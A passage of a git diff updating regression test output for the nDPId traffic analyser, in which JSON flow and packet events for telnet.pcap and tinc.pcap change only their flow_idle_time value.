-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":943755158389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":943755158389,"pkt":"AKDMO7\/6AADAn6CXCABFAAA8UeMAAEAGp4XAqAABwKgAAgAXBg4X8WM9mcWg7aASQ+D7twAAAgQFqAEDAwABAQgKACWmLACcJyQ="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":943755158389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":943755158389,"pkt":"AADAn6CXAKDMO7\/6CABFEAA0Rj1AAEAGcyPAqAACwKgAAQYOABeZxaDtF\/FjPoAQfXjt1wAAAQEICgCcJyQAJaYs"} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":943755158387,"flow_last_seen":943755158537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":943755158537,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} +00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":943755158387,"flow_last_seen":943755158387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":943755158387,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":943755158387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":943755158387,"pkt":"AADAn6CXAKDMO7\/6CABFEAA8RjxAAEAGcxzAqAACwKgAAQYOABeZxaDsAAAAAKACfXjgowAAAgQFtAQCCAoAnCckAAAAAAEDAwA="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":943755158389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":943755158389,"pkt":"AKDMO7\/6AADAn6CXCABFAAA8UeMAAEAGp4XAqAABwKgAAgAXBg4X8WM9mcWg7aASQ+D7twAAAgQFqAEDAwABAQgKACWmLACcJyQ="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":943755158389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":943755158389,"pkt":"AADAn6CXAKDMO7\/6CABFEAA0Rj1AAEAGcyPAqAACwKgAAQYOABeZxaDtF\/FjPoAQfXjt1wAAAQEICgCcJyQAJaYs"} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":943755158387,"flow_last_seen":943755158537,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":943755158537,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} 00200{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":18,"source":"telnet.pcap","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":943755158548} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":18,"source":"telnet.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":66,"pkt_l4_len":0,"thread_ts_msec":943755158547,"pkt":"AADAn6CXAKDMO7\/6CABFEACJRkRAAEAGcsfAqAACwKgAAQYOABeZxaFUF\/FjhIAYfXjMkwAAAQEICgCcJzQAJaYs"} -00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":943755158387,"flow_last_seen":943755159705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":943755159705,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":31,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":943755158387,"flow_last_seen":943755160949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":943755160949,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"fake","password":""}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":943755158387,"flow_last_seen":943755159705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":943755159705,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":31,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":943755158387,"flow_last_seen":943755160949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":943755160949,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"fake","password":""}} 00200{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":32,"source":"telnet.pcap","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":943755160950} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":32,"source":"telnet.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":66,"pkt_l4_len":0,"thread_ts_msec":943755160949,"pkt":"AADAn6CXAKDMO7\/6CABFEAA6RkpAAEAGcxDAqAACwKgAAQYOABeZxaGyF\/FjyYAYfXgMpwAAAQEICgCcKCQAJaYu"} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":943755158387,"flow_last_seen":943755160962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":943755160962,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"fake","password":""}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":943755158387,"flow_last_seen":943755160962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":943755160962,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"fake","password":""}} 00200{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":52,"source":"telnet.pcap","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":943755178297} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":52,"source":"telnet.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":66,"pkt_l4_len":0,"thread_ts_msec":943755178295,"pkt":"AADAn6CXAKDMO7\/6CABFEABORlNAAEAGcvPAqAACwKgAAQYOABeZxaHEF\/FmAIAYfXjBVQAAAQEICgCcLuoAJaY2"} 00200{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":70,"source":"telnet.pcap","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":943755184206} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":70,"source":"telnet.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":66,"pkt_l4_len":0,"thread_ts_msec":943755184205,"pkt":"AADAn6CXAKDMO7\/6CABFEAA5RlxAAEAGcv\/AqAACwKgAAQYOABeZxaHeF\/Fns4AYfXjYKQAAAQEICgCcMTkAJaZf"} 00200{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":78,"source":"telnet.pcap","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":943755185261} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":78,"source":"telnet.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":66,"pkt_l4_len":0,"thread_ts_msec":943755185260,"pkt":"AADAn6CXAKDMO7\/6CABFEAA4Rl9AAEAGcv3AqAACwKgAAQYOABeZxaHjF\/FoUIAYfXhjlAAAAQEICgCcMaMAJaZf"} -00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":92,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":87,"flow_first_seen":943755158387,"flow_last_seen":943755197958,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":488,"flow_tot_l4_payload_len":1660,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":943755197958,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"}} +00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":92,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":87,"flow_first_seen":943755158387,"flow_last_seen":943755197958,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":488,"flow_tot_l4_payload_len":1660,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":943755197958,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":92,"source":"telnet.pcap","alias":"nDPId-test","packets-captured":92,"packets-processed":87,"total-skipped-flows":0,"total-l4-data-len":1660,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":22,"global_ts_msec":943755197958} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 92/87 diff --git a/test/results/tinc.pcap.out b/test/results/tinc.pcap.out index 69a22d771..ef53b30e9 100644 --- a/test/results/tinc.pcap.out +++ b/test/results/tinc.pcap.out @@ -1,15 +1,15 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tinc.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tinc.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1495983427717} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983427717,"flow_last_seen":1495983427717,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1495983427717,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1495983427717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1495983427717,"pkt":"ABcILL3nACbGCvpSCABFEAA8vEtAAEAGvw6DcqgbuVPacOds2We5l\/9AAAAAAKACchD0JwAAAgQFtAQCCAp3tTETAAAAAAEDAwc="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983427744,"flow_last_seen":1495983427744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1495983427744,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1495983427744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1495983427744,"pkt":"ABcILL3nACbGCvpSCABFEAA8k+lAAEAG53CDcqgbuVPacMCK2WgWL9D7AAAAAKACchDyzQAAAgQFtAQCCAoov3nyAAAAAAEDAwc="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1495983427768,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1495983427768,"pkt":"ACbGCvpSABcILL3nCABFCAA0AABAADEGimq5U9pwg3KoG9ln52yg0OtBuZf\/QYASOQhw5gAAAgQFtAEBBAIBAwMH"} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1495983427768,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1495983427768,"pkt":"ABcILL3nACbGCvpSCABFEAAovExAAEAGvyGDcqgbuVPacOds2We5l\/9BoNDrQlAQAOXp2wAA"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1495983427794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1495983427794,"pkt":"ACbGCvpSABcILL3nCABFCAA0AABAADEGimq5U9pwg3KoG9lowIoRT99iFi\/Q\/IASOQgE1gAAAgQFtAEBBAIBAwMH"} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1495983427794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1495983427794,"pkt":"ABcILL3nACbGCvpSCABFEAAok+pAAEAG54ODcqgbuVPacMCK2WgWL9D8EU\/fY1AQAOV9ywAA"} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1495983427717,"flow_last_seen":1495983427818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":2097,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1495983427818,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1495983427744,"flow_last_seen":1495983427846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":2090,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1495983427846,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983427717,"flow_last_seen":1495983427717,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1495983427717,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1495983427717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1495983427717,"pkt":"ABcILL3nACbGCvpSCABFEAA8vEtAAEAGvw6DcqgbuVPacOds2We5l\/9AAAAAAKACchD0JwAAAgQFtAQCCAp3tTETAAAAAAEDAwc="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983427744,"flow_last_seen":1495983427744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1495983427744,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1495983427744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1495983427744,"pkt":"ABcILL3nACbGCvpSCABFEAA8k+lAAEAG53CDcqgbuVPacMCK2WgWL9D7AAAAAKACchDyzQAAAgQFtAQCCAoov3nyAAAAAAEDAwc="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1495983427768,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1495983427768,"pkt":"ACbGCvpSABcILL3nCABFCAA0AABAADEGimq5U9pwg3KoG9ln52yg0OtBuZf\/QYASOQhw5gAAAgQFtAEBBAIBAwMH"} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1495983427768,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1495983427768,"pkt":"ABcILL3nACbGCvpSCABFEAAovExAAEAGvyGDcqgbuVPacOds2We5l\/9BoNDrQlAQAOXp2wAA"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1495983427794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1495983427794,"pkt":"ACbGCvpSABcILL3nCABFCAA0AABAADEGimq5U9pwg3KoG9lowIoRT99iFi\/Q\/IASOQgE1gAAAgQFtAEBBAIBAwMH"} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1495983427794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1495983427794,"pkt":"ABcILL3nACbGCvpSCABFEAAok+pAAEAG54ODcqgbuVPacMCK2WgWL9D8EU\/fY1AQAOV9ywAA"} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1495983427717,"flow_last_seen":1495983427818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":2097,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1495983427818,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1495983427744,"flow_last_seen":1495983427846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":2090,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1495983427846,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 